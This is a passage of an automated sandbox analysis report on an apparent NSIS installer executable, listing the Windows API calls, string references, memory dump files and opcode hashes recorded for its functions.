                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-823278215
                                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                  • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                  • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73471171
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 734711E3
                                                                  • GlobalFree.KERNEL32 ref: 7347124A
                                                                  • GlobalFree.KERNEL32(?), ref: 7347129B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 734712B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: dded7603923c40227dce3309549501126f4c112bc5aa762bd89b7aae0edd4570
                                                                  • Instruction ID: eef431223a1ed32abf3f7d58748fd2c0fcf7f398e23594041edf40eb6edc423a
                                                                  • Opcode Fuzzy Hash: dded7603923c40227dce3309549501126f4c112bc5aa762bd89b7aae0edd4570
                                                                  • Instruction Fuzzy Hash: 02517BB6900301DFE718EF69C944BA677F8FB09714B14456AE94AFF350E734A901CB98
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(0066E140), ref: 00401C10
                                                                  • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree
                                                                  • String ID: @f$Call
                                                                  • API String ID: 3394109436-1910501656
                                                                  • Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                  • Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
                                                                  • Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                  • Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll), ref: 0040269A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp$C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll
                                                                  • API String ID: 1659193697-441332769
                                                                  • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                  • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                                  • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                  • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(000002E0,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
                                                                  • CloseHandle.KERNEL32(000002F4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
                                                                  • C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 00403C98
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
                                                                  • API String ID: 2962429428-568009694
                                                                  • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                  • Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
                                                                  • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                  • Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9
                                                                  APIs
                                                                    • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                    • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 0040600A
                                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 004060B2
                                                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004060C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
                                                                  • API String ID: 3248276644-917692060
                                                                  • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                  • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                                  • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                  • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 004056AA
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                                    • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                  • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                                  • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                  • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: Call
                                                                  • API String ID: 3356406503-1824292864
                                                                  • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                  • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                                  • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                  • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\x6yDsHJ9tr.exe,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00405FA3
                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\x6yDsHJ9tr.exe,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00405FB3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-1246513382
                                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                  • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                  • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                                  • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                  • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                                  • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                  • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99